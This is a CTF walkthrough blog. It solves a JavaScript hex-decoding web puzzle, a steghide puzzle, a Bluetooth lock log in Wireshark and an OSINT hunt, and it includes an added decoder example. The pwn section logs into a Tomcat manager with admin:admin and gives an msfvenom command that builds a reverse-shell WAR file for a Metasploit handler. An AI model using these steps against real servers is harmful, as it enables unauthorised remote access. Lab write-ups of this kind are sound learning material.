Sector443 CTF Walkthrough
This is where it all started: I was watching an episode of The Boys when a friend of mine gave me a link to this CTF and asked me to play if I had the time, and I had plenty XD
Most of the challenges were based on reverse engineering binaries.
Web
The challenge had an HTML file; when opened with a browser it gives a prompt to enter a password. The end goal is to find the password, which is the flag.
Here is the code. By the looks of it I can see a load of variable declarations and looping, but the hex thing looks promising; printing it on the console spits out some char codes.
console.log("\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35");
Now we have a set of char codes, which can then be converted using the String.fromCharCode function.
console.log(String.fromCharCode(102, 108, 97, 103, 123, 55, 56, 54, 79, 115, 69, 114, 116, 107, 49, 50, 125));
Which returns the flag
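The two manual steps above can be done in one pass without running the obfuscated page script. This is an added example, not code from the challenge; the function names are made up for illustration, and the input is the escaped literal from the console.log call above, treated as raw source text.

```javascript
// Added example: statically decode a "\xNN"-escaped list of char codes.
// Nothing from the obfuscated page is evaluated.

// The escaped literal from the walkthrough, kept as raw text
// (String.raw leaves the backslashes in place).
const SAMPLE = String.raw`\x31\x30\x32\x2c\x31\x30\x38\x2c\x39\x37\x2c\x31\x30\x33\x2c\x31\x32\x33\x2c\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30\x2c\x31\x32\x35`;

// Step 1: turn each \xNN escape into the character it encodes.
function unescapeHex(raw) {
  return raw.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// Step 2: parse a comma-separated list of decimal char codes.
// Anything that is not a plain UTF-16 code unit is rejected, so a string
// that is not actually a char-code list fails loudly instead of decoding
// to garbage.
function parseCharCodes(list) {
  return list.split(",").map((token) => {
    const t = token.trim();
    if (!/^\d{1,5}$/.test(t)) {
      throw new Error(`not a char code: "${t}"`);
    }
    const code = Number(t);
    if (code > 0xffff) {
      throw new Error(`char code out of range: ${code}`);
    }
    return code;
  });
}

// Step 3: both layers together, escaped text in, plain text out.
function decodeObfuscated(raw) {
  return String.fromCharCode(...parseCharCodes(unescapeHex(raw)));
}

console.log(decodeObfuscated(SAMPLE));
```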
Chasing and avenging the Hydra's head Arnim Zola, Captain America finally got control over the ship and crashed into the Arctic
going into an unconscious sleep of "steghide".
Releasing Next: Captain America "wintersoldier"
So we have steghide and wintersoldier which means only one thing.
And we have the flag: flag{YzRwdDQxbl80bTNyMWM0}
Forensics
In this challenge we are given a btsnoop log file from which we have to find the unlock sequence and get the value, which is the flag. We can view the log file in Wireshark.
Now we have to find the unlock request. As the challenge description says, the unlock request is sent through an app, so the source would be a smartphone and the destination is the smart lock.
By filtering on the source and searching for a Value attribute, I was able to figure out the unlock request.
OSINT
In this challenge the goal is to find a person whose name is "Peter Grulich" who likes ponies, and we need to find the flag. I started my search on Google by entering the following
By checking the Remove secret commit, we have a flag.
Pwn
In this challenge we have to download a VM and import it into VirtualBox in order to solve the challenge. Before that, a host-only connection has to be made in order to access the box (which I didn't like). After importing the machine and starting it, we have a static IP address.
By running Nmap on the IP address we can see that port 8080 is open, which is running Apache Tomcat.
By checking the manager page we get a login prompt; by trying admin:admin we are able to log in to the app.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.x.x LPORT=xxxx -f war > shell.war
Now all we have to do is start an exploit handler in Metasploit, upload the WAR file and execute it.